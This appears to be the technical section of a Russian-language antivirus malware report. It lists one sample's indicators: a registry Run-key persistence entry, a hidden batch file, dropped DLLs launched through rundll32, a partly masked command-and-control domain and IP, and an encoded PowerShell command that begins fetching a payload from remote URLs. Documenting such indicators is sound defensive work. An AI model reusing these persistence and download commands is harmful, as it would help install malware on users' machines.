Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'wnstxmwhfyd.wlj' = '%WINDIR%\SysWOW64\rundll32.exe "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",AFdOuWi'
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\uwdhx.bat
- %ALLUSERSPROFILE%\683248970.dll
- %ALLUSERSPROFILE%\683248970.dll в %LOCALAPPDATA%\dfkpeuemhkjs\wnstxmwhfyd.wlj
- 'th####ndskill.com':443
- '17#.#04.227.98':443
- DNS ASK th####ndskill.com
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- '%WINDIR%\syswow64\cmd.exe' /c %ALLUSERSPROFILE%\uwdhx.bat' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwAHMAOgAvAC8AdABoAGUAdAByAGUAbgBkAHMAawBpAGwAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUASAAxADEALwAsAGgAdAB0AHAAOgAvAC8AYQBsAGkAdAB0AGwAZQBiAHIAYQB2AGUALgBj...
- '%WINDIR%\syswow64\rundll32.exe' %ALLUSERSPROFILE%\683248970.dll,f1989767434
- '%WINDIR%\syswow64\rundll32.exe' "%ALLUSERSPROFILE%\683248970.dll",DllRegisterServer
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",GGNaGhUENVrJ
- '%WINDIR%\syswow64\rundll32.exe' "%LOCALAPPDATA%\Dfkpeuemhkjs\wnstxmwhfyd.wlj",DllRegisterServer